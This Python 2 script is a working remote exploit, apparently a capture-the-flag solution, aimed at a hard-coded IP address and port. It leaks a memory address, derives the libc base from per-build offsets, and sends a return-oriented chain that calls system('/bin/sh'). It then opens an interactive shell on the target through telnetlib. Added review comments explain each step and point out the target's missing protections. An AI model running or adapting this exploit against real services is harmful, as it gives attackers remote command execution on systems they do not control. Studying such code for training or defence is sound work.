- import socket, struct, binascii
- import telnetlib
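def readline(sc, show=True):
    """Read one newline-terminated line from socket ``sc``, a byte at a time.

    Bytes are accumulated until a ``"\\n"`` arrives; the line is returned
    without the terminator.  A zero-length ``recv`` means the peer closed
    the connection: the partial line is printed and the process exits.

    Args:
        sc: a connected socket whose ``recv`` returns ``str`` chunks
            (Python 2 style; with Python 3 ``bytes`` the concatenation
            below would raise TypeError).
        show: when true, also print ``repr`` of the line that was read.

    Returns:
        The received line as a string, newline stripped.

    Raises:
        SystemExit: when the peer disconnects before a newline arrives.
            Exit status is 1 so a scripted caller can tell the
            disconnect from a normal run (the original used the
            site-provided ``exit()``, i.e. status 0).
    """
    res = ""
    # One byte per recv() so nothing past the newline is consumed from the
    # socket; the next reader starts exactly after the terminator.
    while not res.endswith("\n"):
        data = sc.recv(1)
        if not data:
            print(repr(res))
            print("Server disconnected")
            raise SystemExit(1)
        res += data
    if show:
        print(repr(res[:-1]))
    return res[:-1]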
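def read_until(sc, s):
    """Read from socket ``sc`` one byte at a time until the data ends with ``s``.

    Args:
        sc: a connected socket whose ``recv`` returns ``str`` chunks
            (Python 2 style; with Python 3 ``bytes`` the concatenation
            below would raise TypeError).
        s: the delimiter string to stop at.  An empty delimiter matches
           immediately, so ``""`` is returned without reading anything.

    Returns:
        Everything received up to and including the delimiter.

    Raises:
        SystemExit: when the peer disconnects before the delimiter arrives.
            Exit status is 1 rather than the status-0 ``exit()`` of the
            original, so a disconnect is distinguishable from success.
    """
    res = ""
    # Single-byte reads so the socket is left positioned right after ``s``.
    while not res.endswith(s):
        data = sc.recv(1)
        if not data:
            print(repr(res))
            print("Server disconnected")
            raise SystemExit(1)
        res += data
    return res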
def x(n):
    """Pack ``n`` as an unsigned 64-bit little-endian integer (8 bytes).

    Args:
        n: an integer in ``0 <= n < 2**64``.

    Returns:
        The 8-byte little-endian encoding of ``n``.

    Raises:
        struct.error: when ``n`` is outside the unsigned 64-bit range.
    """
    qword = struct.Struct("<Q")
    return qword.pack(n)
# Two hard-coded target profiles (host:port plus per-build constants).  The
# literal ``if True`` makes the ``else`` branch dead code; the values are
# specific to the builds this script was written against and nothing below
# validates them.
if True:
    ip = ("136.243.194.41", 666)
    distance = 0x5795d0
    puts_offset = 0x0000000000070A30
    poprdi_offset = 0x000000000001F6B5
    system_offset = 0x00000000000443D0
else:
    ip = ("10.0.0.97", 12345)
    distance = 0x55a610
    puts_offset = 0x000000000006B9F0
    poprdi_offset = 0x000000000001F6B2
    system_offset = 0x00000000000414F0

# NOTE(review): this is a Python 2 script (print statements, ``str`` used as
# a byte string).  Under Python 3 ``sc.recv`` returns ``bytes`` and the
# ``str`` concatenations below raise TypeError; ``telnetlib`` is also
# deprecated since 3.11 and removed in 3.13.
sc = socket.create_connection(ip)

# Wire format used for every message: an 8-byte little-endian length, then
# a body of exactly that many bytes.
s = "X" * 9
sc.send(x(len(s)))
sc.send(s)
res = sc.recv(16384)

# The reply is sliced at the 9 bytes that were sent; whatever follows
# (trailing newline stripped) is treated as the upper bytes of an address:
# a NUL is prepended and the value is right-padded to 8 bytes before being
# unpacked as a little-endian QWORD.  Presumably the service echoes back
# more than it received -- that cannot be confirmed from this side.
addr = ("\x00" + res[9:].rstrip("\n")).ljust(8, "\x00")
print binascii.b2a_hex(addr)
addr = struct.unpack("<Q", addr)[0]
print "address", hex(addr)
# The profile constants turn the received address into a libc load base.
libcbase = addr - (distance + puts_offset)

# Second message: 8 filler bytes, a value derived from the received address,
# and one fixed literal address.  NOTE(review): a literal address in the
# 0x400000 range suggests a non-PIE target binary -- TODO confirm.
s = "XXXXXXXX" + x(addr + 8 - 0x800) + x(0x00000000004004EE)
sc.send(struct.pack("<Q", len(s)))
sc.send(s)
print "res", repr(sc.recv(16384))

# Third message: filler, two libc-relative values computed from ``libcbase``
# and the profile offsets, another leak-relative value, and the literal
# "/bin/sh".  NOTE(review): the server code is not visible here; from a
# defender's view the things to check on the service are whether the
# length-prefixed read is bounded, and whether the binary is built PIE with
# stack protection, since a fixed address and this message layout only work
# without them.
s = "XXXXXXXX" + "AAAAAAAA" + x(libcbase + poprdi_offset) + x(addr - 0x7d0) + "CCCCCCCC" + x(libcbase + system_offset) + "/bin/sh\x00"
sc.send(struct.pack("<Q", len(s)))
sc.send(s)
res = sc.recv(16384)
print "res", repr(res)

# Hand the already-connected socket to telnetlib for an interactive session;
# interact() returns once the peer side reaches EOF.
t = telnetlib.Telnet()
t.sock = sc
t.interact()

# Drain anything still on the socket and hex-dump it line by line.
# NOTE(review): once interact() has returned the socket is probably already
# at EOF, so this loop likely exits on its first recv().
while True:
    data = sc.recv(16384)
    if len(data) == 0:
        break
    for line in data.split("\n"):
        print "xx", binascii.b2a_hex(line)